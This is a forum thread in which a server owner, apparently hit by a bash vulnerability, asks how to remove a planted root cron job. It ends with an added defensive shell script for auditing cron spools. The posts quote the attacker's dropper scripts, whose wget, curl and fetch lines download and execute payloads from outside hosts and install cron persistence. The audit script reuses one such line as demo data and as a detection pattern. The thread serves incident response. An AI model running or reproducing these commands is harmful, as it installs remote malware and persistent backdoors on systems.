
How can I remove the cron made by the "stablehost" vulnerability?

Posted: 2014/10/04 18:58:28
by tomingy
My box was just affected by

@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1

a few hours ago. But I think I am safe now because my bash version is


[root@fr02 cron]# rpm -q bash
bash-4.1.2-15.el6_5.2.x86_64
It created a cron under root. In /var/spool/cron/root, it has the above syntax.


[root@fr02 cron]# crontab -l
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
[root@fr02 cron]#
I tried crontab -e, used webmin to disable/remove it, and even tried a hard delete, but all with no luck.


in /var/spool/cron/root
...
-rw-------   1 root root  104 Oct  4 09:11 root
...
[root@fr02 cron]# rm root
rm: remove regular file `root'? y
rm: cannot remove `root': Permission denied
[root@fr02 cron]# echo '' > root
-bash: root: Permission denied
Is there a way to disable or remove it?

Thanks.

Re: How can I remove the cron made by the "stablehost" vulnerability

Posted: 2014/10/04 22:20:55
by poky
Try (before rm):
chattr -i -a root

Re: How can I remove the cron made by the "stablehost" vulnerability

Posted: 2014/10/04 22:23:30
by TrevorH
If they have root access then you have no idea what else they have done. Your only safe option is to take that box off the net and reinstall it. It could have dozens of backdoors installed and you don't know any of them.

They had root access. They could have done anything to your machine. It might have a keylogger installed that's catching all your attempts to clean up. It could be sending your ssh keys and passwords out to who knows where...

Re: How can I remove the cron made by the "stablehost" vulnerability

Posted: 2014/10/05 03:22:48
by tomingy
poky wrote: Try (before rm):
chattr -i -a root
Thank you. It worked.

Re: How can I remove the cron made by the "stablehost" vulnerability

Posted: 2014/10/05 03:46:02
by tomingy
TrevorH wrote:If they have root access then you have no idea what else they have done. Your only safe option is to take that box off the net and reinstall it. It could have dozens of backdoors installed and you don't know any of them.

They had root access. They could have done anything to your machine. It might have a keylogger installed that's catching all your attempts to clean up. It could be sending your ssh keys and passwords out to who knows where...
I agree with what you said. I need to reinstall the box.

I did not notice my box was affected until I received an email from the Cron Daemon.
--2014-10-05 00:00:01-- http://stablehost.us/bots/regular.bot
Resolving stablehost.us... failed: No address associated with hostname.
wget: unable to resolve host address “stablehost.us”
Then I immediately checked /tmp; it contained the following sh scripts, which were all created a few hours ago.
[root@fr02 tmp]# vi .pwn

wget http://www.computer-services.name/b.c -O /tmp/b.c;
curl -o /tmp/b.c http://www.computer-services.name/b.c;
fetch -o /tmp/b.c http://www.computer-services.name/b.c;
wget http://www.computer-services.name/b.c -O /tmp/.c;
curl -o /tmp/.c http://www.computer-services.name/.c;
fetch -o /tmp/.c http://www.computer-services.name/.c;
gcc -o .d /tmp/b.c
chmod +x /tmp/.c
/tmp/.c
/tmp/.d
rm -rf /tmp/.a /tmp/b.c /tmp/.c /tmp/.d

echo "@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2&1" >>/tmp/c
crontab /tmp/c
rm -rf /tmp/c
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
@daily wget http://xfsdfadsdgfs.tba.pw/update -O /tmp/update;sh /tmp/update;rm -rf /tmp/update
@daily wget http://update2.x24hr.com/update2 -O /tmp/update2;sh /tmp/update2;rm -rf /tmp/update2
@daily wget http://update.mrbonus.com/update3 -O /tmp/update3;sh /tmp/update3;rm -rf /tmp/update3

cron.weekly
#!/bin/sh
#wget http://stablehost.us/bots/regular.bot -O /tmp/sh
#curl -o /tmp/sh http://stablehost.us/bots/regular.bot
#sh /tmp/sh
#rm -rf /tmp/sh

img.sh
#!/bin/sh
starts=`pwd`
str=`date | md5sum | head -c8`
wget http://82.165.131.9/imgs.png -O $str;chmod +x $str;./$str;rm -rf $str
echo $str

echo "@daily wget http://xfsdfadsdgfs.tba.pw/update -O /tmp/update;sh /tmp/update;rm -rf /tmp/update">>/tmp/cc
echo "@daily wget http://update2.x24hr.com/update2 -O /tmp/update2;sh /tmp/update2;rm -rf /tmp/update2">>/tmp/cc
echo "@daily wget http://update.mrbonus.com/update3 -O /tmp/update3;sh /tmp/update3;rm -rf /tmp/update3">>/tmp/cc
crontab /tmp/cc
apt-get -y install bash&
yum -y update bash&
zypper --non-interactive update bash&


shred -f -u $starts/$0
rm -f $starts/$0
But it seems all the hosts have been taken down. Then I ran yum to update bash.
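Two things in this thread are worth turning into a repeatable check: poky's point that the spool file had the immutable/append-only attributes (which is why `rm` and `echo '' > root` both failed), and the dropper in the last post, which installs its persistence with `crontab /tmp/c` and `crontab /tmp/cc`, so more than one spool file may be affected. The script below is an added example, not code from the thread or from any of the posters. It scans a cron spool directory for fetch-and-execute entries of the kind shown above, reports whether each suspect file carries the `i`/`a` attributes, and clears them before removal. The directory and file names built by `make_demo_spool`, the two benign crontab lines, and the matching regex are all my own constructions for the demo; the regex is a heuristic, not a published signature. On a CentOS 6 box the real spool is /var/spool/cron (it holds only per-user crontabs, so /etc/crontab and /etc/cron.d still need a separate look), and `chattr` only works as root.

```shell
#!/bin/sh
# Added example (not from the thread): audit a cron spool for the kind of
# fetch-and-execute persistence shown in the posts above, check for the
# immutable/append-only flags that blocked "rm root", and clear them
# before removal. Paths in make_demo_spool are constructed for the demo.

# Heuristic (my own, not a published signature): a downloader writing
# under /tmp, followed later on the same line by "sh" or "." of a /tmp
# path. grep exits 0 when at least one line matches.
CRON_FETCH_EXEC_RE='(wget|curl|fetch) .*-[oO] */tmp/.*; *(sh|\.) +/tmp/'

suspicious_cron_lines() {
    grep -E "$CRON_FETCH_EXEC_RE" "$1"
}

# Number of matching lines (prints 0 when the file is clean).
count_suspicious() {
    grep -cE "$CRON_FETCH_EXEC_RE" "$1"
}

# 0 = immutable (i) or append-only (a) flag set, 1 = neither,
# 2 = cannot tell (no lsattr, or a filesystem such as tmpfs without flags).
cron_is_locked() {
    command -v lsattr >/dev/null 2>&1 || return 2
    flags=$(lsattr -d "$1" 2>/dev/null | awk '{print $1}')
    case "$flags" in
        "")      return 2 ;;
        *i*|*a*) return 0 ;;
        *)       return 1 ;;
    esac
}

# Clear the flags (needs CAP_LINUX_IMMUTABLE, i.e. root) and delete.
# Returns 0 only if the file is really gone, so a still-locked file is
# reported rather than silently ignored.
unlock_and_remove() {
    if command -v chattr >/dev/null 2>&1; then
        chattr -i -a "$1" 2>/dev/null || :
    fi
    rm -f "$1" 2>/dev/null || :
    [ ! -e "$1" ]
}

# Walk every per-user crontab in a spool directory. Returns 0 when nothing
# looks suspicious, 1 otherwise; the report goes to stdout.
audit_spool() {
    dir="$1"; bad=0
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        if suspicious_cron_lines "$f" >/dev/null; then
            bad=1
            printf 'SUSPECT: %s (user %s)\n' "$f" "$(basename "$f")"
            suspicious_cron_lines "$f" | sed 's/^/    /'
            locked=$(cron_is_locked "$f"; echo $?)
            case "$locked" in
                0) echo "    immutable/append-only set: chattr -i -a before rm" ;;
                1) echo "    no special attributes; rm will work" ;;
                *) echo "    attributes unknown (no lsattr, or unsupported fs)" ;;
            esac
        fi
    done
    return $bad
}

# Constructed stand-in for /var/spool/cron: the entry from the thread plus
# two benign jobs. Prints the directory it created.
make_demo_spool() {
    d=$(mktemp -d)
    cat >"$d/root" <<'EOF'
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
0 2 * * * /usr/bin/find /tmp -type f -mtime +7 -delete
EOF
    cat >"$d/backup" <<'EOF'
30 4 * * 0 /usr/local/bin/backup.sh
EOF
    chmod 600 "$d/root" "$d/backup"
    echo "$d"
}

# sh audit_cron.sh --demo             run against the constructed spool
# sh audit_cron.sh /var/spool/cron    audit a real spool (as root)
case "${1:-}" in
    --demo) d=$(make_demo_spool); audit_spool "$d"; rc=$?; rm -rf "$d"; exit $rc ;;
    "")     ;;
    *)      audit_spool "$1" ;;
esac
```

The audit deliberately reports rather than deletes: as TrevorH says, once root is lost the crontab is only the visible symptom, so the output is evidence to collect before the rebuild. `unlock_and_remove` is there for the case in the thread, where the poster needed the entry gone immediately; it still returns non-zero if the file survives, which is what you see when `chattr` is run without root.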